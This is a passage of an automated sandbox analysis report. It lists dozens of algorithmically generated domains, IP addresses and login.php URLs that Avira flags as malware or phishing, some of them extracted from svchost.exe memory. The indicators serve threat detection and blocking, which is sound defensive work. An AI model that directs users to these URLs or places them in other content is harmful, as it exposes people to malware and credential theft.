http://galyhib.com/login.php100%Avira URL Cloudmalware
http://ganykaz.com/login.php100%Avira URL Cloudmalware
http://qetylyv.com/100%Avira URL Cloudphishing
http://qegyfyp.com/login.php100%Avira URL Cloudmalware
http://qexyhuv.com/login.phpC:100%Avira URL Cloudmalware
http://lyxygax.com/login.php100%Avira URL Cloudmalware
http://vopykum.com/login.php100%Avira URL Cloudmalware
http://puvymul.com/http://lyryled.com/http://lysyxux.com/0100%Avira URL Cloudmalware
http://lyxyxox.com/login.php100%Avira URL Cloudmalware
http://qedykiv.com/login.php100%Avira URL Cloudmalware
http://puzylol.com/login.php100%Avira URL Cloudphishing
http://lymywaj.com/login.php100%Avira URL Cloudmalware
http://lysyfyj.com/login.php100%Avira URL Cloudmalware
http://qekyqop.com/login.php100%Avira URL Cloudmalware
http://volyquk.com/login.php100%Avira URL Cloudmalware
http://purywoq.com/login.php100%Avira URL Cloudmalware
http://volyjif.com/login.php100%Avira URL Cloudmalware
http://puzyxip.com/login.php100%Avira URL Cloudmalware
http://qegyval.com/http://purytyg.com/http://purytyg.com/http://qegyval.com/http://vocyjic.com/http:100%Avira URL Cloudmalware
http://gacynuz.com/login.php100%Avira URL Cloudmalware
http://gahyvuh.com/login.php100%Avira URL Cloudmalware
http://pumyxiv.com/login.php100%Avira URL Cloudmalware
http://lyryled.com/100%Avira URL Cloudmalware
http://lymysan.com/login.php100%Avira URL Cloudphishing
http://puzyduq.com/login.php100%Avira URL Cloudmalware
http://volycem.com/login.php100%Avira URL Cloudmalware
http://galyqaz.com/login.php100%Avira URL Cloudmalware
http://lyxysad.com/login.php100%Avira URL Cloudmalware
http://gacyzuz.com/login.php100%Avira URL Cloudphishing
http://gahyzez.com/login.php100%Avira URL Cloudmalware
http://lykyjad.com/login.php100%Avira URL Cloudmalware
http://purywyl.com/login.php100%Avira URL Cloudmalware
http://vojycec.com/login.php100%Avira URL Cloudmalware
http://volyzic.com/login.php100%Avira URL Cloudmalware
http://vojydam.com/login.php100%Avira URL Cloudmalware
http://pufybyv.com/login.php100%Avira URL Cloudmalware
http://gatyfus.com/login.php100%Avira URL Cloudmalware
http://puzylyp.com/100%Avira URL Cloudmalware
http://lyvyjox.com/login.php100%Avira URL Cloudmalware
http://lysyxux.com/100%Avira URL Cloudmalware
http://lyrytun.com/login.php100%Avira URL Cloudphishing

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
pupydeq.com
13.248.169.48
truefalse
    		high
    pupycag.com
    		18.208.156.248
    		truefalse
      		high
      lyvyxor.com
      		208.100.26.245
      		truefalse
        		high
        77026.bodis.com
        		199.59.243.227
        		truefalse
          		high
          lysyvan.com
          		188.114.97.3
          		truefalse
            		high
            galynuh.com
            		64.225.91.73
            		truefalse
              		high
              qegyhig.com
              		188.114.96.3
              		truefalse
                		high
                gatyfus.com
                		85.17.31.82
                		truefalse
                  		high
                  fp2e7a.wpc.phicdn.net
                  		192.229.221.95
                  		truefalse
                    		high
                    vonypom.com
                    		18.208.156.248
                    		truefalse
                      		high
                      puzylyp.com
                      		75.2.71.199
                      		truefalse
                        		high
                        qexyhuv.com
                        		76.223.67.189
                        		truefalse
                          		high
                          77980.bodis.com
                          		199.59.243.227
                          		truefalse
                            		high
                            pltraffic7.com
                            		72.52.179.174
                            		truefalse
                              		high
                              gadyciz.com
                              		44.221.84.105
                              		truefalse
                                		high
                                gadyniw.com
                                		154.212.231.82
                                		truefalse
                                  		high
                                  lyxynyx.com
                                  		103.224.212.210
                                  		truefalse
                                    		high
                                    www.sedoparking.com
                                    		64.190.63.136
                                    		truefalse
                                      		high
                                      lygyvuj.com
                                      		52.34.198.229
                                      		truefalse
                                        		high
                                        lygynud.com
                                        		3.94.10.34
                                        		truefalse
                                          		high
                                          s-part-0017.t-0009.t-msedge.net
                                          		13.107.246.45
                                          		truefalse
                                            		high
                                            gahyqah.com
                                            		23.253.46.64
                                            		truefalse
                                              		high
                                              vocyzit.com
                                              		44.221.84.105
                                              		truefalse
                                                		high
                                                galyqaz.com
                                                		199.191.50.83
                                                		truefalse
                                                  		high
                                                  vofycot.com
                                                  		103.224.182.252
                                                  		truefalse
                                                    		high
                                                    qetyhyg.com
                                                    		64.225.91.73
                                                    		truefalse
                                                      		high
                                                      gahyhiz.com
                                                      		44.221.84.105
                                                      		truefalse
                                                        		high
                                                        qetyfuv.com
                                                        		44.221.84.105
                                                        		truefalse
                                                          		high
                                                          gtm-sg-6l13ukk0m05.qu200.com
                                                          		103.150.10.48
                                                          		truetrue
                                                            		unknown
                                                            lymyxid.com
                                                            		3.94.10.34
                                                            		truefalse
                                                              		high
                                                              qegyval.com
                                                              		154.85.183.50
                                                              		truefalse
                                                                		high
                                                                gatyzoz.com
                                                                		unknown
                                                                		unknowntrue
                                                                  		unknown
                                                                  lykygaj.com
                                                                  		unknown
                                                                  		unknowntrue
                                                                    		unknown
                                                                    qedyxel.com
                                                                    		unknown
                                                                    		unknowntrue
                                                                      		unknown
                                                                      qedyqup.com
                                                                      		unknown
                                                                      		unknowntrue
                                                                        		unknown
                                                                        qekyluv.com
                                                                        		unknown
                                                                        		unknowntrue
                                                                          		unknown
                                                                          gatyrez.com
                                                                          		unknown
                                                                          		unknowntrue
                                                                            		unknown
                                                                            vofybic.com
                                                                            		unknown
                                                                            		unknowntrue
                                                                              		unknown
                                                                              pujydag.com
                                                                              		unknown
                                                                              		unknowntrue
                                                                                		unknown
                                                                                vojykom.com
                                                                                		unknown
                                                                                		unknowntrue
                                                                                  		unknown
                                                                                  qetysuq.com
                                                                                  		unknown
                                                                                  		unknowntrue
                                                                                    		unknown
                                                                                    vonyzut.com
                                                                                    		unknown
                                                                                    		unknowntrue
                                                                                      		unknown
                                                                                      pufyjuq.com
                                                                                      		unknown
                                                                                      		unknowntrue
                                                                                        		unknown
                                                                                        pujytug.com
                                                                                        		unknown
                                                                                        		unknowntrue
                                                                                          		unknown
                                                                                          galyhiw.com
                                                                                          		unknown
                                                                                          		unknowntrue
                                                                                            		unknown
                                                                                            lykygun.com
                                                                                            		unknown
                                                                                            		unknowntrue
                                                                                              		unknown
                                                                                              vopymyc.com
                                                                                              		unknown
                                                                                              		unknowntrue
                                                                                                		unknown
                                                                                                gatyfaz.com
                                                                                                		unknown
                                                                                                		unknowntrue
                                                                                                  		unknown
                                                                                                  vojycit.com
                                                                                                  		unknown
                                                                                                  		unknowntrue
                                                                                                    		unknown
                                                                                                    lyvymej.com
                                                                                                    		unknown
                                                                                                    		unknowntrue
                                                                                                      		unknown
                                                                                                      lygyvar.com
                                                                                                      		unknown
                                                                                                      		unknowntrue
                                                                                                        		unknown
                                                                                                        purygiv.com
                                                                                                        		unknown
                                                                                                        		unknowntrue
                                                                                                          		unknown
                                                                                                          gahykeb.com
                                                                                                          		unknown
                                                                                                          		unknowntrue
                                                                                                            		unknown
                                                                                                            purymog.com
                                                                                                            		unknown
                                                                                                            		unknowntrue
                                                                                                              		unknown
                                                                                                              gadyzib.com
                                                                                                              		unknown
                                                                                                              		unknowntrue
                                                                                                                		unknown
                                                                                                                ganyqow.com
                                                                                                                		unknown
                                                                                                                		unknowntrue
                                                                                                                  		unknown
                                                                                                                  lyxysun.com
                                                                                                                  		unknown
                                                                                                                  		unknowntrue
                                                                                                                    		unknown
                                                                                                                    puzyjyg.com
                                                                                                                    		unknown
                                                                                                                    		unknowntrue
                                                                                                                      		unknown
                                                                                                                      vopydek.com
                                                                                                                      		unknown
                                                                                                                      		unknowntrue
                                                                                                                        		unknown
                                                                                                                        qexyfuq.com
                                                                                                                        		unknown
                                                                                                                        		unknowntrue
                                                                                                                          		unknown
                                                                                                                          gatykyh.com
                                                                                                                          		unknown
                                                                                                                          		unknowntrue
                                                                                                                            		unknown
                                                                                                                            vocykem.com
                                                                                                                            		unknown
                                                                                                                            		unknowntrue
                                                                                                                              		unknown
                                                                                                                              gahynus.com
                                                                                                                              		unknown
                                                                                                                              		unknowntrue
                                                                                                                                		unknown
                                                                                                                                pumypop.com
                                                                                                                                		unknown
                                                                                                                                		unknowntrue
                                                                                                                                  		unknown
                                                                                                                                  lyvysur.com
                                                                                                                                  		unknown
                                                                                                                                  		unknowntrue
                                                                                                                                    		unknown
                                                                                                                                    puzypav.com
                                                                                                                                    		unknown
                                                                                                                                    		unknowntrue
                                                                                                                                      		unknown
                                                                                                                                      galypob.com
                                                                                                                                      		unknown
                                                                                                                                      		unknowntrue
                                                                                                                                        		unknown
                                                                                                                                        gacyqoz.com
                                                                                                                                        		unknown
                                                                                                                                        		unknowntrue
                                                                                                                                          		unknown
                                                                                                                                          lykywid.com
                                                                                                                                          		unknown
                                                                                                                                          		unknowntrue
                                                                                                                                            		unknown
                                                                                                                                            lykytin.com
                                                                                                                                            		unknown
                                                                                                                                            		unknowntrue
                                                                                                                                              		unknown
                                                                                                                                              vofyref.com
                                                                                                                                              		unknown
                                                                                                                                              		unknowntrue
                                                                                                                                                		unknown
                                                                                                                                                qekytig.com
                                                                                                                                                		unknown
                                                                                                                                                		unknowntrue
                                                                                                                                                  		unknown
                                                                                                                                                  vocyzek.com
                                                                                                                                                  		unknown
                                                                                                                                                  		unknowntrue
                                                                                                                                                    		unknown
                                                                                                                                                    puvypoq.com
                                                                                                                                                    		unknown
                                                                                                                                                    		unknowntrue
                                                                                                                                                      		unknown
                                                                                                                                                      puvybeg.com
                                                                                                                                                      		unknown
                                                                                                                                                      		unknowntrue
                                                                                                                                                        		unknown
                                                                                                                                                        pupydig.com
                                                                                                                                                        		unknown
                                                                                                                                                        		unknowntrue
                                                                                                                                                          		unknown
                                                                                                                                                          pupyguq.com
                                                                                                                                                          		unknown
                                                                                                                                                          		unknowntrue
                                                                                                                                                            		unknown
                                                                                                                                                            qedyqal.com
                                                                                                                                                            		unknown
                                                                                                                                                            		unknowntrue
                                                                                                                                                              		unknown
                                                                                                                                                              vowymom.com
                                                                                                                                                              		unknown
                                                                                                                                                              		unknowntrue
                                                                                                                                                                		unknown
                                                                                                                                                                purypol.com
                                                                                                                                                                		unknown
                                                                                                                                                                		unknowntrue
                                                                                                                                                                  		unknown
                                                                                                                                                                  ganypeb.com
                                                                                                                                                                  		unknown
                                                                                                                                                                  		unknowntrue
                                                                                                                                                                    		unknown
                                                                                                                                                                    vopymit.com
                                                                                                                                                                    		unknown
                                                                                                                                                                    		unknowntrue
                                                                                                                                                                      		unknown
                                                                                                                                                                      vowyguf.com
                                                                                                                                                                      		unknown
                                                                                                                                                                      		unknowntrue
                                                                                                                                                                        		unknown
                                                                                                                                                                        pupytiq.com
                                                                                                                                                                        		unknown
                                                                                                                                                                        		unknowntrue
                                                                                                                                                                          		unknown
                                                                                                                                                                          lymyfoj.com
                                                                                                                                                                          		unknown
                                                                                                                                                                          		unknowntrue
                                                                                                                                                                            		unknown
                                                                                                                                                                            vowyzuf.com
                                                                                                                                                                            		unknown
                                                                                                                                                                            		unknowntrue
                                                                                                                                                                              		unknown
                                                                                                                                                                              gatyruw.com
                                                                                                                                                                              		unknown
                                                                                                                                                                              		unknowntrue
                                                                                                                                                                                		unknown
                                                                                                                                                                                qebynyg.com
                                                                                                                                                                                		unknown
                                                                                                                                                                                		unknowntrue
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  puzymev.com
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  		unknowntrue
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    pupymol.com
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    		unknowntrue
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      vojycif.com
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      		unknowntrue
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        qebyvyl.com
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        		unknowntrue
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          lymysan.com
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          		unknowntrue
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            qekynuq.com
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            		unknowntrue
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              puryjil.com
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              		unknowntrue
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                puvytuv.com
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                		unknowntrue
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  galyzus.com
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  		unknowntrue
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    gadyfuh.com
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    		unknowntrue
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      vofycyk.com
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      		unknowntrue
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        lyxywer.com
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        		unknowntrue
                                                                                                                                                                                                          		unknown

                                                                                                                                                                                                          Contacted URLs

                                                                                                                                                                                                          NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          http://ww16.vofycot.com/login.php?sub1=20241112-0426-044d-b465-1d078f2f97datrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://puzylyp.com/login.phptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://galyqaz.com/login.phptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown

                                                                                                                                                                                                          URLs from Memory and Binaries

                                                                                                                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          http://qedysov.com/login.phpsvchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793070832.0000000003339000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gaqycyz.com/svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gatypas.com/login.phpsvchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643374628.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puvymul.com/http://puvymul.com/svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pupymol.com/login.phpsvchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684006366.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1678100644.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1943198717.000000000CD30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vopycoc.com/login.phpsvchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684758224.0000000005A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2011810643.000000000CC4F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vofybic.com/login.phpsvchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633515874.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630932773.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630421381.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632737159.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vojyzyt.com/login.phpsvchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1815884349.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603144571.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817894345.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qeqykop.com/login.phpsvchost.exe, 00000002.00000003.1690442076.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691406398.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2687870645.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688548835.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078523532.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1690742245.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661728781.000000000085E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vocyjet.com/login.phpsvchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638315636.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644050118.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640883554.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640769851.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyryvur.com/svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844960136.000000000CCB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845988945.000000000CCB8000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lykyfud.com/login.phpsvchost.exe, 00000002.00000003.1644432968.000000000327F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://purycap.com/login.phpsvchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564981200.000000000CC62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
